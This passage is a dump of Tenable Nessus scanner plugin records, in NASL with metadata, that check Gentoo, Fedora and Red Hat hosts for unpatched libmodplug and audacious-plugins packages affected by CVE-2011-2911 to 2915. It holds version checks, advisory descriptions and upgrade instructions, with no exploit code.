:\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201203-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Audacious Plugins users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=media-plugins/audacious-plugins-3.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:audacious-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-plugins/audacious-plugins\", unaffected:make_list(\"ge 3.1\"), vulnerable:make_list(\"lt 3.1\"))) 
flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Audacious Plugins\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:10", "description": "Patch to use the system's libmodplug library.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2011-09-19T00:00:00", "title": "Fedora 14 : audacious-plugins-2.4.5-4.fc14 (2011-12370)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-09-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:audacious-plugins", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-12370.NASL", "href": "https://www.tenable.com/plugins/nessus/56224", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-12370.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56224);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name:\"FEDORA\", value:\"2011-12370\");\n\n script_name(english:\"Fedora 14 : audacious-plugins-2.4.5-4.fc14 (2011-12370)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Patch to use the system's libmodplug library.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/066044.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9e28a386\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected audacious-plugins package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:audacious-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: 
\"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"audacious-plugins-2.4.5-4.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"audacious-plugins\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:03", "description": "Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2011-08-23T00:00:00", "title": "Fedora 16 : libmodplug-0.8.8.4-1.fc16 (2011-10452)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-08-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libmodplug", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2011-10452.NASL", "href": "https://www.tenable.com/plugins/nessus/55946", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-10452.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55946);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"FEDORA\", value:\"2011-10452\");\n script_xref(name:\"Secunia\", value:\"45131\");\n\n script_name(english:\"Fedora 16 : libmodplug-0.8.8.4-1.fc16 (2011-10452)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://modplug-xmms.sourceforge.net/#news\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=728371\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-August/064279.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b571bd05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 
get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"libmodplug-0.8.8.4-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:03", "description": "Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2011-08-17T00:00:00", "title": "Fedora 15 : libmodplug-0.8.8.4-1.fc15 (2011-10544)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-08-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libmodplug", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-10544.NASL", "href": "https://www.tenable.com/plugins/nessus/55870", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-10544.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55870);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name:\"FEDORA\", value:\"2011-10544\");\n script_xref(name:\"Secunia\", value:\"45131\");\n\n script_name(english:\"Fedora 15 : libmodplug-0.8.8.4-1.fc15 (2011-10544)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://modplug-xmms.sourceforge.net/#news\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=728371\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-August/063873.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88a98c41\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = 
os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"libmodplug-0.8.8.4-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:09:45", "description": "Updated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. 
(CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.", "edition": 26, "published": "2011-09-07T00:00:00", "title": "RHEL 4 : gstreamer-plugins (RHSA-2011:1264)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-09-07T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins", "p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins-devel"], "id": "REDHAT-RHSA-2011-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/56111", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1264. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56111);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"RHSA\", value:\"2011:1264\");\n\n script_name(english:\"RHEL 4 : gstreamer-plugins (RHSA-2011:1264)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. 
(CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1264\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected gstreamer-plugins and / or gstreamer-plugins-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/07\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1264\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer-plugins / gstreamer-plugins-devel\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:03", "description": "Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2011-08-17T00:00:00", "title": "Fedora 14 : libmodplug-0.8.8.4-1.fc14 (2011-10503)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-08-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libmodplug", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-10503.NASL", "href": "https://www.tenable.com/plugins/nessus/55869", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-10503.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55869);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name:\"FEDORA\", value:\"2011-10503\");\n script_xref(name:\"Secunia\", value:\"45131\");\n\n script_name(english:\"Fedora 14 : libmodplug-0.8.8.4-1.fc14 (2011-10503)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://modplug-xmms.sourceforge.net/#news\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=728371\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-August/063786.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8739c01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 